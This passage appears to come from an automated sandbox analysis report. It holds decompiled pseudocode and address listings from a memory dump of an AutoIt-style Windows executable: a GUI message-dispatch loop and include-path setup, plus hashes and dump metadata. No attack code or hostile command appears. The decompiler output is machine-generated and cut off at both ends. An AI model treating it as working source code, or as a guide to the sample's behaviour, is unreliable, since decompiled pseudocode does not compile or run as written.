														_t511 =  ~_t547;
														E00A93EC0(_t533 +  *_t533->message, _t511, 0);
														_t471 = _t533 +  *_t533->message;
														_v332 = 0;
														E00A9D620( &_v332, _t533 +  *_t533->message);
														__eflags = _t547;
														L151:
														if(__eflags == 0) {
															goto L29;
														}
														__eflags = _t547;
														if(_t547 <= 0) {
															L156:
															_push(_t533[0xbd]);
															_t533[0x51] = 1;
															_t533[0x3e] = 0;
															E00AC3187(_t533[0xbd], _t606);
															_t572 =  &(_t572[1]);
															goto L29;
														}
														L153:
														_t389 = _t533[0x3e];
														__eflags = _t389 - 5;
														if(_t389 == 5) {
															L155:
															_v188.hwnd = 0;
															_v188.wParam = 1;
															_v188.lParam = 0;
															E00A99190(_t533,  &_v188);
															_t471 =  *_t533;
															_t511 = _t533 +  *_t533->message;
															__eflags = _t511;
															_v188.wParam = 7;
															_v188 =  *(_t533[0x76]);
															E00B0319B( *_t533, _t511,  &_v188, 0);
															E00A99190(_t533,  &_v188);
															goto L156;
														}
														__eflags = _t389 - 3;
														if(_t389 != 3) {
															goto L156;
														}
														goto L155;
													}
													if(__eflags > 0) {
														goto L29;
													}
													goto L153;
											}
										}
										while(1) {
											L58:
											__eflags = _v244.message - 0x12;
											if(_v244.message == 0x12) {
												break;
											}
											_t471 = 0xb38630;
											_t336 = E00A9D3E0(0xb38630,  &_v244);
											__eflags = _t336;
											if(_t336 == 0) {
												_t338 = E00A9D400(0xb38630,  &_v244);
												__eflags = _t338;
												if(_t338 == 0) {
													TranslateMessage( &_v244);
													_t471 =  &_v244;
													DispatchMessageW( &_v244); // executed
												}
											}
											_t511 =  &_v244;
											_t337 = PeekMessageW(_t511, 0, 0, 0, 1);
											__eflags = _t337;
											if(_t337 == 0) {
												L8:
												if( *0xb274e6 == 1) {
													 *0xb274ec = 0;
													 *0xb274e6 = 0;
													_t533[0x3e] = 1;
												}
												if(_t533[0x3e] == 1) {
													_t471 = _t533 +  *_t533->message;
													_v304 = 0;
													E00A9D620( &_v304, _t533 +  *_t533->message);
													goto L30;
												} else {
													goto L10;
												}
											} else {
												continue;
											}
										}
										_t533[0x3f] = 1;
										_t533[0x3e] = 1;
										goto L8;
									}
									_t400 = E00A9C870(_t533[0xbe]);
									_t471 = 0;
									__eflags = _t511;
									if(__eflags < 0) {
										goto L56;
									}
									_t462 = 0;
									if(__eflags > 0) {
										L65:
										__eflags = _t533[0x3e] - 2;
										if(_t533[0x3e] != 2) {
											_t471 = _t533 +  *_t533->message;
											_v324 = _t462;
											E00A9D620( &_v324, _t533 +  *_t533->message);
										}
										L66:
										_t533[0x51] = 1;
										_t533[0x3e] = _t462;
										goto L29;
									}
									__eflags = _t400 - _t533[0xbc];
									if(_t400 >= _t533[0xbc]) {
										goto L65;
									}
									goto L56;
								} else {
									_t480 = _a4;
									_t533[0x3d] = _t480;
									_t403 = _t480;
									_t471 = _t480 + 1;
									_a4 = _t480 + 1;
									_t598 = _t403 -  *0xb390f8; // 0x0
									if(_t598 > 0 || _t403 <= 0) {
										L160:
										_t533[0x3e] = 1;
										goto L29;
									} else {
										_t405 = (_t403 << 4) +  *0xb3912c;
										if(_t405 == 0) {
											goto L160;
										}
										_t549 = _t405;
										_t471 =  *(_t549 + 4);
										_v328 = 0;
										_t511 =  *( *(_t549 + 4));
										_t406 = _t511->wParam;
										if(_t406 != 0) {
											__eflags = _t406 - 0x34;
											if(__eflags != 0) {
												_t407 = _t406 - 1;
												__eflags = _t407 - 0x7e;
												if(_t407 > 0x7e) {
													L166:
													_t511 = _t511->wParam;
													E00AEE724(_t606, _t533, 0x1388, _t511);
													goto L29;
												}
												switch( *((intOrPtr*)(( *(_t407 + 0xa99864) & 0x000000ff) * 4 +  &M00A99850))) {
													case 0:
														__eax = 0;
														__ecx =  &_v164;
														_v164 = 0;
														_v152 = 0;
														__eax =  &_v328;
														__edx = __esi;
														__ebx = __edi;
														_v156 = 1;
														__eax = E00A98F10( &_v328, __ebx, __esi,  &_v164); // executed
														__eflags = __eax;
														if(__eax == 0) {
															__edx =  *(__esi + 4);
															__eax = _v328;
															__eax =  *( *(__esi + 4) + _v328 * 4);
															__eflags =  *((short*)(__eax + 8)) - 0x7f;
															if( *((short*)(__eax + 8)) != 0x7f) {
																__ecx =  *((short*)(__eax + 0xa));
																__eax = E00AEE724(__fp0, __edi, 0x72,  *((short*)(__eax + 0xa)));
															}
														}
														__esi =  &_v164;
														__eax = E00A99190(__edi, __esi);
														goto L29;
													case 1:
														E00A99210(_t549, _t606, _t533); // executed
														goto L29;
													case 2:
														__ebx = __edi + 0x488;
														__eax = E00AC23E7(__ebx);
														__eflags = __al;
														if(__al != 0) {
															__eax =  &_v328;
															__eax = E00B0FA6A(__fp0, __edi, __esi,  &_v328, __ebx);
															__eflags = __eax;
															if(__eax != 0) {
																__ecx =  *(__esi + 4);
																__edx = _v328;
																__eax =  *( *(__esi + 4) + _v328 * 4);
																__ecx =  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa));
																__eax = E00AEE724(__fp0, __edi, 0xaa,  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa)));
															}
														} else {
															__edx =  *((short*)(__edx + 0xa));
															__eax = E00AEE724(__fp0, __edi, 0xa7, __edx);
														}
														goto L29;
													case 3:
														goto L29;
													case 4:
														goto L166;
												}
											}
											_t471 =  &_v276;
											_v276 = 0;
											_v268 = 1;
											_v264 = 0;
											_t414 = E00A998F0( &_v328, __eflags, _t606, _t533, _t549,  &_v276,  &_v277); // executed
											__eflags = _t414;
											if(_t414 != 0) {
												L37:
												_t564 = _v264;
												__eflags = _t564;
												if(_t564 != 0) {
													 *( *(_t564 + 0xc)) =  *( *(_t564 + 0xc)) - 1;
													_t511 =  *(_t564 + 0xc);
													__eflags = _t511->hwnd;
													if(_t511->hwnd == 0) {
														_push(_t564->i);
														E00AA10FC();
														_t471 =  *(_t564 + 0xc);
														_push( *(_t564 + 0xc));
														E00AA10FC();
														_t572 =  &(_t572[2]);
													}
													_push(_t564);
													E00AA10FC();
													_t572 =  &(_t572[1]);
													_v264 = 0;
												}
												_t415 = _v268;
												__eflags = _t415 - 8;
												if(_t415 == 8) {
													_t565 = _v276;
													__eflags = _t565;
													if(_t565 != 0) {
														__imp__#9(_t565);
														_push(_t565);
														E00AA10FC();
														_t572 =  &(_t572[1]);
													}
												} else {
													__eflags = _t415 - 0xa;
													if(_t415 == 0xa) {
														_t417 = _v276;
														__eflags = _t417;
														if(_t417 != 0) {
															E00AD30B0(_t417);
														}
													} else {
														__eflags = _t415 - 5;
														if(_t415 == 5) {
															E00A9E470( &_v276, _t564);
														} else {
															__eflags = _t415 - 0xb;
															if(_t415 == 0xb) {
																_t566 = _v276;
																_t511 =  *(_t566 + 4);
																_push(_t511);
																E00AA10FC();
																_push(_t566);
																E00AA10FC();
																_t572 =  &(_t572[2]);
															} else {
																__eflags = _t415 - 0xc;
																if(_t415 == 0xc) {
																	_t423 = _v276;
																	__eflags = _t423;
																	if(_t423 != 0) {
																		E00ADB350(_t423);
																	}
																}
															}
														}
													}
												}
												goto L29;
											}
											_t511 =  *(_t549 + 4);
											_t431 =  *((intOrPtr*)(_t511 + _v328 * 4));
											__eflags =  *((short*)(_t431 + 8)) - 0x7f;
											if( *((short*)(_t431 + 8)) != 0x7f) {
												_t471 =  *((short*)(_t431 + 0xa));
												E00AEE724(_t606, _t533, 0x72,  *((short*)(_t431 + 0xa)));
												E00A99190(_t533,  &_v288);
												goto L29;
											}
											goto L37;
										} else {
											E00A9B1F0(_t606, _t533, _t549,  &_a4); // executed
											goto L29;
										}
									}
								}
							}
						}
						if( *0xb38668 != 0) {
							__eflags = _t533[0x3e];
							if(_t533[0x3e] == 0) {
								goto L10;
							}
						}
						if(PeekMessageW( &_v244, 0, 0, 0, 1) != 0) {
							goto L58;
						}
						goto L8;
					}
					goto L30;
				}
			}












































































































                            0x00a99430
                            0x00a99430
                            0x00a99430
                            0x00a99436
                            0x00a9943f
                            0x00a99441
                            0x00a9944c
                            0x00abd73b
                            0x00abd742
                            0x00abd747
                            0x00a995f5
                            0x00a995fb
                            0x00a995fb
                            0x00a99452
                            0x00a99453
                            0x00a99457
                            0x00a99460
                            0x00a997d2
                            0x00a997d2
                            0x00a9946d
                            0x00a99474
                            0x00a995d6
                            0x00a995d6
                            0x00a995dc
                            0x00a995e6
                            0x00a997fd
                            0x00a99802
                            0x00a99809
                            0x00000000
                            0x00000000
                            0x00a99811
                            0x00a99818
                            0x00a99825
                            0x00a9983f
                            0x00a99841
                            0x00a99843
                            0x00000000
                            0x00000000
                            0x00abe0de
                            0x00abe0e6
                            0x00abe0f4
                            0x00abe108
                            0x00abe10a
                            0x00abe10a
                            0x00000000
                            0x00a995ec
                            0x00a995ed
                            0x00a995f3
                            0x00a995f3
                            0x00000000
                            0x00a995f3
                            0x00a99480
                            0x00a99480
                            0x00a99494
                            0x00a994da
                            0x00a994e1
                            0x00abd796
                            0x00abd79b
                            0x00abd79d
                            0x00abd7a2
                            0x00abd7a8
                            0x00abd7aa
                            0x00abd7ac
                            0x00abd7d9
                            0x00abd7d9
                            0x00abd7db
                            0x00000000
                            0x00000000
                            0x00abd80e
                            0x00abd813
                            0x00abd822
                            0x00abd82d
                            0x00abd831
                            0x00abd83c
                            0x00a995c9
                            0x00a995d0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a995d0
                            0x00abd7b2
                            0x00abd7b8
                            0x00abd7b8
                            0x00abd7ba
                            0x00abd7bd
                            0x00000000
                            0x00000000
                            0x00abd7c3
                            0x00abd7c5
                            0x00abd7c7
                            0x00000000
                            0x00000000
                            0x00abd7cd
                            0x00abd7cd
                            0x00abd7ce
                            0x00abd7d1
                            0x00abd7d1
                            0x00000000
                            0x00abd7b8
                            0x00a994e7
                            0x00a994ee
                            0x00abd846
                            0x00abd84d
                            0x00000000
                            0x00000000
                            0x00abd855
                            0x00000000
                            0x00abd855
                            0x00a994f4
                            0x00a994fb
                            0x00abd860
                            0x00abd867
                            0x00000000
                            0x00000000
                            0x00abd86d
                            0x00abd873
                            0x00abd87a
                            0x00abd882
                            0x00abd886
                            0x00abd887
                            0x00abd88b
                            0x00abd893
                            0x00abd898
                            0x00abd89a
                            0x00000000
                            0x00000000
                            0x00abd8a0
                            0x00abd8a2
                            0x00abd8a6
                            0x00abd92a
                            0x00abd92a
                            0x00abd934
                            0x00abd939
                            0x00000000
                            0x00abd939
                            0x00abd8af
                            0x00abd8b3
                            0x00abd8b8
                            0x00abd8ba
                            0x00000000
                            0x00000000
                            0x00abd8c0
                            0x00abd8d3
                            0x00abd8d3
                            0x00abd8df
                            0x00abd905
                            0x00abd912
                            0x00abd912
                            0x00abd917
                            0x00abd91b
                            0x00abd91f
                            0x00abd926
                            0x00000000
                            0x00abd926
                            0x00abd8ca
                            0x00abd8cd
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abd8cd
                            0x00abd942
                            0x00abd942
                            0x00abd948
                            0x00abd94c
                            0x00abd94c
                            0x00abd94d
                            0x00abd951
                            0x00abd959
                            0x00abd95e
                            0x00abd960
                            0x00000000
                            0x00000000
                            0x00abd966
                            0x00abd96a
                            0x00abd96c
                            0x00abd970
                            0x00abd993
                            0x00abd942
                            0x00abd948
                            0x00000000
                            0x00abd948
                            0x00abd976
                            0x00abd97b
                            0x00abd980
                            0x00abd980
                            0x00abd99a
                            0x00abd99f
                            0x00abd9a6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abd9ac
                            0x00abd942
                            0x00a99501
                            0x00a99508
                            0x00abd9b1
                            0x00abd9b8
                            0x00000000
                            0x00000000
                            0x00abd9be
                            0x00abd9c5
                            0x00000000
                            0x00000000
                            0x00abd9d0
                            0x00abd9d5
                            0x00abd9d5
                            0x00abd9df
                            0x00abd9e4
                            0x00abd9e6
                            0x00000000
                            0x00000000
                            0x00abd9f6
                            0x00abd9f8
                            0x00000000
                            0x00000000
                            0x00abda20
                            0x00abda25
                            0x00abda27
                            0x00000000
                            0x00000000
                            0x00abda34
                            0x00abda38
                            0x00abda3c
                            0x00abda40
                            0x00abda49
                            0x00abda59
                            0x00abda5d
                            0x00abda6c
                            0x00abda73
                            0x00abda7c
                            0x00abda91
                            0x00abda99
                            0x00abda9d
                            0x00abdaac
                            0x00abdab3
                            0x00abdabc
                            0x00abdac8
                            0x00abdacd
                            0x00abdad4
                            0x00abdadc
                            0x00abdae0
                            0x00abdaeb
                            0x00abdaef
                            0x00abdaf6
                            0x00abdb02
                            0x00abdb0c
                            0x00abdb13
                            0x00abdb18
                            0x00abdb1e
                            0x00abdbb5
                            0x00abdbb5
                            0x00abdbba
                            0x00abdbbe
                            0x00abdbc3
                            0x00000000
                            0x00abdbc3
                            0x00abdbcc
                            0x00abdbd0
                            0x00abdbd0
                            0x00a9950e
                            0x00a99516
                            0x00000000
                            0x00000000
                            0x00a99523
                            0x00abdbda
                            0x00abdbe1
                            0x00000000
                            0x00000000
                            0x00abdbec
                            0x00abdbf1
                            0x00abdbf1
                            0x00abdbfb
                            0x00abdc00
                            0x00abdc02
                            0x00000000
                            0x00000000
                            0x00abdc12
                            0x00abdc14
                            0x00000000
                            0x00000000
                            0x00abdc3c
                            0x00abdc41
                            0x00abdc43
                            0x00000000
                            0x00000000
                            0x00abdb35
                            0x00abdb3c
                            0x00abdb43
                            0x00abdb4a
                            0x00abdb53
                            0x00abdb5a
                            0x00abdb66
                            0x00abdb6d
                            0x00abdb78
                            0x00abdb7f
                            0x00abdb86
                            0x00abdb92
                            0x00abdb99
                            0x00abdb9c
                            0x00abdba3
                            0x00abdba8
                            0x00abdbae
                            0x00000000
                            0x00abdbae
                            0x00abdc4a
                            0x00abdc4e
                            0x00abdc4e
                            0x00a99529
                            0x00a99529
                            0x00a99532
                            0x00abdc58
                            0x00abdc61
                            0x00abdc67
                            0x00abdc6b
                            0x00abdc70
                            0x00abdc82
                            0x00abdc88
                            0x00abdc8f
                            0x00abdc9e
                            0x00abdca2
                            0x00abdca8
                            0x00abdcad
                            0x00abdcb4
                            0x00abdcb4
                            0x00000000
                            0x00abdc70
                            0x00a9953b
                            0x00abdcc5
                            0x00abdccb
                            0x00abdcd2
                            0x00abdd35
                            0x00abdd37
                            0x00abdd37
                            0x00abdd42
                            0x00abdd48
                            0x00abdd4d
                            0x00abdd50
                            0x00abdd57
                            0x00abdd7c
                            0x00abdd81
                            0x00000000
                            0x00000000
                            0x00abdd87
                            0x00abdd87
                            0x00abdd89
                            0x00abdd89
                            0x00abdd8f
                            0x00abdd97
                            0x00abdd99
                            0x00abdda5
                            0x00abddb2
                            0x00abddb8
                            0x00abddb8
                            0x00abddbe
                            0x00abddc5
                            0x00abddfc
                            0x00abddfe
                            0x00abde07
                            0x00abde09
                            0x00abddcb
                            0x00abddcf
                            0x00abddd3
                            0x00abddd5
                            0x00abdddb
                            0x00abdddb
                            0x00abdde1
                            0x00abdde3
                            0x00abddea
                            0x00abddf2
                            0x00abddf2
                            0x00abde15
                            0x00abde1c
                            0x00abde22
                            0x00000000
                            0x00abde22
                            0x00abdd5d
                            0x00abdd62
                            0x00abdd72
                            0x00000000
                            0x00abdd72
                            0x00abdd68
                            0x00000000
                            0x00abdd68
                            0x00abdcde
                            0x00abdce5
                            0x00abdce7
                            0x00abdce9
                            0x00000000
                            0x00000000
                            0x00abdcef
                            0x00abdd01
                            0x00abdd01
                            0x00abdd07
                            0x00abdd09
                            0x00abdd10
                            0x00abdd16
                            0x00abdd16
                            0x00abdd1c
                            0x00abdd21
                            0x00abdd27
                            0x00abdd2b
                            0x00000000
                            0x00abdd2b
                            0x00abdcf5
                            0x00abdcfb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a9954a
                            0x00a9954d
                            0x00a99721
                            0x00a99727
                            0x00a9972e
                            0x00a99755
                            0x00a99755
                            0x00a9975b
                            0x00a9975e
                            0x00000000
                            0x00000000
                            0x00abde46
                            0x00abde49
                            0x00abde4c
                            0x00000000
                            0x00abde52
                            0x00abde52
                            0x00000000
                            0x00abde82
                            0x00000000
                            0x00000000
                            0x00abdf62
                            0x00abdf67
                            0x00abdf69
                            0x00abdf6b
                            0x00000000
                            0x00000000
                            0x00abdf71
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abde5a
                            0x00abde87
                            0x00abde87
                            0x00abde89
                            0x00abde8b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abde65
                            0x00abde6a
                            0x00abde6c
                            0x00abde6e
                            0x00abde91
                            0x00abde9a
                            0x00abde9f
                            0x00abdea9
                            0x00abdeaf
                            0x00abdeb7
                            0x00abdebc
                            0x00abdebe
                            0x00abdebe
                            0x00000000
                            0x00000000
                            0x00abdec4
                            0x00abdec6
                            0x00abdf3a
                            0x00abdf40
                            0x00abdf41
                            0x00abdf48
                            0x00abdf52
                            0x00abdf57
                            0x00000000
                            0x00abdf57
                            0x00abdecc
                            0x00abdecc
                            0x00abded2
                            0x00abded5
                            0x00abdee4
                            0x00abdef5
                            0x00abdefc
                            0x00abdf07
                            0x00abdf0e
                            0x00abdf13
                            0x00abdf1b
                            0x00abdf1b
                            0x00abdf1e
                            0x00abdf29
                            0x00abdf30
                            0x00abdf35
                            0x00000000
                            0x00abdf35
                            0x00abdedb
                            0x00abdede
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abdede
                            0x00abde74
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00abde52
                            0x00a99770
                            0x00a99770
                            0x00a99770
                            0x00a99775
                            0x00000000
                            0x00000000
                            0x00a99780
                            0x00a99785
                            0x00a9978a
                            0x00a9978c
                            0x00a99798
                            0x00a9979d
                            0x00a9979f
                            0x00a997a6
                            0x00a997ac
                            0x00a997b1
                            0x00a997b1
                            0x00a9979f
                            0x00a997bf
                            0x00a997c4
                            0x00a997c6
                            0x00a997c8
                            0x00a994c0
                            0x00a994c7
                            0x00abd779
                            0x00abd780
                            0x00abd787
                            0x00abd787
                            0x00a994d4
                            0x00abe0c6
                            0x00abe0cc
                            0x00abe0d4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a997ce
                            0x00000000
                            0x00a997ce
                            0x00a997c8
                            0x00abd763
                            0x00abd76a
                            0x00000000
                            0x00abd76a
                            0x00a99736
                            0x00a9973b
                            0x00a9973d
                            0x00a9973f
                            0x00000000
                            0x00000000
                            0x00a99741
                            0x00a99743
                            0x00a997dc
                            0x00a997dc
                            0x00a997e3
                            0x00abde32
                            0x00abde38
                            0x00abde3c
                            0x00abde3c
                            0x00a997e9
                            0x00a997e9
                            0x00a997f0
                            0x00000000
                            0x00a997f0
                            0x00a99749
                            0x00a9974f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a99577
                            0x00a99577
                            0x00a9957a
                            0x00a99580
                            0x00a99582
                            0x00a99583
                            0x00a99586
                            0x00a9958c
                            0x00abdf7c
                            0x00abdf7c
                            0x00000000
                            0x00a9959a
                            0x00a9959d
                            0x00a995a3
                            0x00000000
                            0x00000000
                            0x00a995a9
                            0x00a995ab
                            0x00a995b0
                            0x00a995b4
                            0x00a995b6
                            0x00a995bc
                            0x00a995fe
                            0x00a99601
                            0x00a996a0
                            0x00a996a1
                            0x00a996a4
                            0x00abdffa
                            0x00abdffa
                            0x00abe005
                            0x00000000
                            0x00abe005
                            0x00a996b1
                            0x00000000
                            0x00a996c5
                            0x00a996c7
                            0x00a996ce
                            0x00a996d5
                            0x00a996dd
                            0x00a996e1
                            0x00a996e3
                            0x00a996e5
                            0x00a996f0
                            0x00a996f5
                            0x00a996f7
                            0x00a996f9
                            0x00a996fc
                            0x00a99700
                            0x00a99703
                            0x00a99708
                            0x00abdf8b
                            0x00abdf93
                            0x00abdf93
                            0x00a99708
                            0x00a9970e
                            0x00a99715
                            0x00000000
                            0x00000000
                            0x00a996bb
                            0x00000000
                            0x00000000
                            0x00abdf9d
                            0x00abdfa4
                            0x00abdfa9
                            0x00abdfab
                            0x00abdfc7
                            0x00abdfce
                            0x00abdfd3
                            0x00abdfd5
                            0x00abdfdb
                            0x00abdfde
                            0x00abdfe2
                            0x00abdfe5
                            0x00abdff0
                            0x00abdff0
                            0x00abdfb1
                            0x00abdfb1
                            0x00abdfbc
                            0x00abdfbc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a996b1
                            0x00a9960c
                            0x00a99617
                            0x00a9961b
                            0x00a99623
                            0x00a99627
                            0x00a9962c
                            0x00a9962e
                            0x00a99645
                            0x00a99645
                            0x00a99649
                            0x00a9964b
                            0x00a99650
                            0x00a99652
                            0x00a99655
                            0x00a99657
                            0x00abe02c
                            0x00abe02d
                            0x00abe032
                            0x00abe038
                            0x00abe039
                            0x00abe03e
                            0x00abe03e
                            0x00a9965d
                            0x00a9965e
                            0x00a99663
                            0x00a99666
                            0x00a99666
                            0x00a9966a
                            0x00a9966e
                            0x00a99671
                            0x00abe046
                            0x00abe04a
                            0x00abe04c
                            0x00abe053
                            0x00abe059
                            0x00abe05a
                            0x00abe05f
                            0x00abe05f
                            0x00a99677
                            0x00a99677
                            0x00a9967a
                            0x00abe067
                            0x00abe06b
                            0x00abe06d
                            0x00abe074
                            0x00abe074
                            0x00a99680
                            0x00a99680
                            0x00a99683
                            0x00abe082
                            0x00a99689
                            0x00a99689
                            0x00a9968c
                            0x00abe08c
                            0x00abe090
                            0x00abe093
                            0x00abe094
                            0x00abe09c
                            0x00abe09d
                            0x00abe0a2
                            0x00a99692
                            0x00a99692
                            0x00a99695
                            0x00abe0aa
                            0x00abe0ae
                            0x00abe0b0
                            0x00abe0b7
                            0x00abe0b7
                            0x00abe0b0
                            0x00a99695
                            0x00a9968c
                            0x00a99683
                            0x00a9967a
                            0x00000000
                            0x00a99671
                            0x00a99630
                            0x00a99637
                            0x00a9963a
                            0x00a9963f
                            0x00abe00f
                            0x00abe017
                            0x00abe020
                            0x00000000
                            0x00abe020
                            0x00000000
                            0x00a995be
                            0x00a995c4
                            0x00000000
                            0x00a995c4
                            0x00a995bc
                            0x00a9958c
                            0x00a9954d
                            0x00a9953b
                            0x00a9949d
                            0x00abd751
                            0x00abd758
                            0x00000000
                            0x00000000
                            0x00abd75e
                            0x00a994ba
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a994ba
                            0x00000000
                            0x00a99480

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Message$Peek$DispatchSleepTranslate
                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                            • API String ID: 1762048999-758534266
                            • Opcode ID: 4a7c440706712ca3bdfac470c7c01c2bd68a838bfa81f5f9c70984810899d873
                            • Instruction ID: aeab0b07a5932908555837ce577a5e4ab112afffb138ce48dd633d8f528f59d7
                            • Opcode Fuzzy Hash: 4a7c440706712ca3bdfac470c7c01c2bd68a838bfa81f5f9c70984810899d873
                            • Instruction Fuzzy Hash: 8E62F571608341AFDB24DF68C984BEBB7E8BF85304F14491DF55987252EB70E889CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E560, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E00A9E560(intOrPtr __eax, void* __ecx, void* __eflags) {
				char _v524;
				char _v1052;
				short _v1580;
				char _v1596;
				short _v1598;
				short _v1600;
				void* __edi;
				void* __esi;
				intOrPtr _t37;
				intOrPtr _t44;
				signed int _t45;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int _t55;
				signed int _t63;
				short* _t65;
				intOrPtr _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t89;
				intOrPtr _t93;
				intOrPtr _t94;
				void* _t95;
				void* _t96;
				void* _t98;
				signed int _t103;
				void* _t107;
				void* _t108;

				_t109 = __eflags;
				_push(_t98);
				_push(_t95);
				_push(0x400);
				 *0xb390e8 = 0;
				 *0xb390ec = __eax;
				 *0xb390f0 = 0;
				 *0xb390f4 = 0;
				 *0xb390f8 = 0;
				 *0xb390fc = 0;
				 *0xb39100 = 0xb15a48;
				 *0xb39104 = 0;
				 *0xb39108 = 0;
				 *0xb3910c = 0;
				 *0xb39110 = 0xb15a48;
				 *0xb39114 = 0;
				 *0xb39118 = 0;
				 *0xb3911c = 0;
				 *0xb39124 = 0;
				 *0xb3912c = 0;
				 *0xb39130 = 0x66; // executed
				_t37 = E00AA14F7(_t95, _t98, __eflags); // executed
				 *0xb39120 = _t37;
				GetModuleFileNameW(0,  &_v1580, 0x104);
				E00AA392E( &_v1580,  &_v524,  &_v1052, 0, 0);
				E00AA397A( &_v1052, L"Include", 0x104);
				E00AA39BE( &_v1580,  &_v524,  &_v1052, 0, 0);
				_push(0x20a);
				_t44 = E00AA14F7(_t95, _t98, _t109);
				_t89 =  *0xb39124; // 0x1
				_t75 =  *0xb39120; // 0x3206f38
				 *((intOrPtr*)(_t75 + _t89 * 4)) = _t44;
				_t45 =  *0xb39124; // 0x1
				_t76 =  *0xb39120; // 0x3206f38
				 *0xb39124 = _t45 + 1;
				E00AA1487( *((intOrPtr*)(_t76 + _t45 * 4)),  &_v1580);
				_t107 = (_t103 & 0xfffffff8) - 0x63c + 0x44;
				E00A9BEC0( &_v1596, _t109);
				_t49 = E00A9E6C0( &_v1596, _t109); // executed
				if(_t49 != 0) {
					_t96 = 0;
					__eflags = 0;
					_v1580 = 0;
					while(1) {
						_t100 =  &_v1596;
						_v1600 =  *((intOrPtr*)(E00A91C30(_t96,  &_v1596, __eflags)));
						_v1598 = 0;
						__eflags =  *((intOrPtr*)(E00A91C30(_t96,  &_v1596, __eflags)));
						if(__eflags == 0) {
							goto L6;
						}
						L4:
						_t65 = E00A91C30(_t96, _t100, __eflags);
						__eflags =  *_t65 - 0x3b;
						if( *_t65 == 0x3b) {
							goto L6;
						}
						E00AA1456( &_v1580,  &_v1600);
						_t107 = _t107 + 8;
						_t96 = _t96 + 1;
						while(1) {
							_t100 =  &_v1596;
							_v1600 =  *((intOrPtr*)(E00A91C30(_t96,  &_v1596, __eflags)));
							_v1598 = 0;
							__eflags =  *((intOrPtr*)(E00A91C30(_t96,  &_v1596, __eflags)));
							if(__eflags == 0) {
								goto L6;
							}
							goto L4;
						}
						L6:
						_t53 = E00AA10E1( &_v1580);
						_t108 = _t107 + 4;
						__eflags = _t53;
						if(__eflags != 0) {
							_t63 = E00AA10E1( &_v1580);
							_t108 = _t108 + 4;
							__eflags =  *((short*)(_t108 + 0x1e + _t63 * 2)) - 0x5c;
							if(__eflags != 0) {
								E00AA1456( &_v1580, "\\");
								_t108 = _t108 + 8;
							}
						}
						_push(0x20a);
						_t54 = E00AA14F7(_t96, _t100, __eflags);
						_t80 =  *0xb39124; // 0x1
						_t93 =  *0xb39120; // 0x3206f38
						 *((intOrPtr*)(_t93 + _t80 * 4)) = _t54;
						_t55 =  *0xb39124; // 0x1
						_t94 =  *0xb39120; // 0x3206f38
						 *0xb39124 = _t55 + 1;
						E00AA2EDA( *((intOrPtr*)(_t94 + _t55 * 4)),  &_v1580, 0x104);
						_t107 = _t108 + 0x10;
						_v1580 = 0;
						__eflags =  *((intOrPtr*)(E00A91C30(_t96,  &_v1596, __eflags)));
						if(__eflags == 0) {
							goto L1;
						} else {
							_t96 = _t96 + 1;
							continue;
						}
					}
				}
				L1:
				E00A92480( &_v1596);
				return 0xb390e8;
			}
































                            0x00a9e560
                            0x00a9e56f
                            0x00a9e570
                            0x00a9e571
                            0x00a9e576
                            0x00a9e57c
                            0x00a9e581
                            0x00a9e587
                            0x00a9e58d
                            0x00a9e593
                            0x00a9e599
                            0x00a9e5a3
                            0x00a9e5a9
                            0x00a9e5af
                            0x00a9e5b5
                            0x00a9e5bf
                            0x00a9e5c5
                            0x00a9e5cb
                            0x00a9e5d1
                            0x00a9e5d7
                            0x00a9e5dd
                            0x00a9e5e7
                            0x00a9e5fa
                            0x00a9e5ff
                            0x00a9e61c
                            0x00a9e633
                            0x00a9e64f
                            0x00a9e654
                            0x00a9e659
                            0x00a9e65e
                            0x00a9e664
                            0x00a9e66a
                            0x00a9e66d
                            0x00a9e672
                            0x00a9e682
                            0x00a9e687
                            0x00a9e68c
                            0x00a9e693
                            0x00a9e69c
                            0x00a9e6a3
                            0x00ab72e4
                            0x00ab72e6
                            0x00ab72e8
                            0x00ab72ed
                            0x00ab72ed
                            0x00ab72fb
                            0x00ab7300
                            0x00ab730a
                            0x00ab730d
                            0x00000000
                            0x00000000
                            0x00ab730f
                            0x00ab730f
                            0x00ab7314
                            0x00ab7318
                            0x00000000
                            0x00000000
                            0x00ab7324
                            0x00ab7329
                            0x00ab732c
                            0x00ab72ed
                            0x00ab72ed
                            0x00ab72fb
                            0x00ab7300
                            0x00ab730a
                            0x00ab730d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ab730d
                            0x00ab732f
                            0x00ab7334
                            0x00ab7339
                            0x00ab733c
                            0x00ab733e
